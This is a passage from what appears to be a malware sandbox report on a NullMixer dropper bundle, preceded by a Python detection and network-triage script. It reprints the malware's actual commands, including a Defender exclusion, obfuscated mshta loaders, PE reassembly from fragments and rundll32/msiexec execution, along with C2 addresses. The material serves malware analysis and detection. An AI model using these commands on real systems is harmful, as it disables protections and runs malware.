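    "browser_kill": re.compile(r'taskkill\b.*[/-]im\s+"?(?:chrome|firefox|msedge)\.exe', re.I),
}

def classify(cmdline):
    """Sorted names of every rule a single command line trips."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(cmdlines):
    """{index: [rule names]} for each command line that trips at least one rule."""
    return {i: classify(c) for i, c in enumerate(cmdlines) if classify(c)}

# Rows copied from the Network table of this report (subset). The 46013 row keeps the
# shifted-column form the extraction produced; parse_rows() repairs it.
SAMPLE_ROWS = """
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| N/A | 127.0.0.1:51583 | | tcp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
"""
# Legitimate services this report's signatures name as abused for hosting/C2 (assumed list).
ABUSED_SERVICES = {"iplogger.org", "pastebin.com", "cdn.discordapp.com", "ip-api.com"}
# Chrome's own traffic after the loader started the browser; treated as noise (assumption).
BROWSER_NOISE = {"www.google.com", "c.pki.goog", "clients2.google.com"}

def parse_rows(table_text):
    """Parse '| Country | Destination | Domain | Proto |' rows into tuples."""
    rows = []
    for line in table_text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if domain in ("tcp", "udp") and proto == "":  # empty Domain cell collapsed by extraction
            domain, proto = "", domain
        rows.append((country, dest, domain.lower(), proto))
    return rows

def triage(table_text):
    """Split resolver traffic from connections and rank what to pivot on."""
    out = {"dns_queries": [], "ptr_lookups": 0, "direct_ip": [], "abused_services": [], "other": []}
    for _country, dest, dom, proto in parse_rows(table_text):
        ip, _, port = dest.rpartition(":")
        if dom in ABUSED_SERVICES and dom not in out["abused_services"]:
            out["abused_services"].append(dom)
        if port == "53" and proto == "udp":  # resolver traffic
            if dom.endswith(".in-addr.arpa"):
                out["ptr_lookups"] += 1  # reverse lookups of contacted peers
            elif dom not in BROWSER_NOISE and dom not in out["dns_queries"]:
                out["dns_queries"].append(dom)
        elif ip.startswith("127."):
            continue  # local IPC, not C2
        elif not dom:  # connection with no name attached: first C2 candidates
            if dest not in out["direct_ip"]:
                out["direct_ip"].append(dest)
        elif dom not in ABUSED_SERVICES | BROWSER_NOISE and (dest, dom) not in out["other"]:
            out["other"].append((dest, dom))
    return out
```

Run against the copied rows, `scan()` flags every stage of the chain except the Chrome control: the Defender exclusion for the drop directory, the mshta `vbscript:` one-liners that copy each dropped binary under a new name and `taskkill` the original, the `set /p "MZ"` plus `copy /b` reassembly of a PE from fragments, and the two loaders (`control.exe` via `rundll32 Shell32.dll,Control_RunDLL`, and `msiexec /Y`) that execute files with non-executable extensions. On the network side `triage()` separates the PTR lookups and browser noise from the three direct-to-IP connections (45.133.1.107:80, 135.181.129.119:4805, 194.104.136.5:46013), which have no DNS name attached and are the natural first pivot.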
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win7-20240708-en
Max time kernel
4s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$701B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$801B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 480
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win10v2004-20241007-en
Max time kernel
11s
Max time network
122s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Socelars
Socelars family
Socelars payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3456 set thread context of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
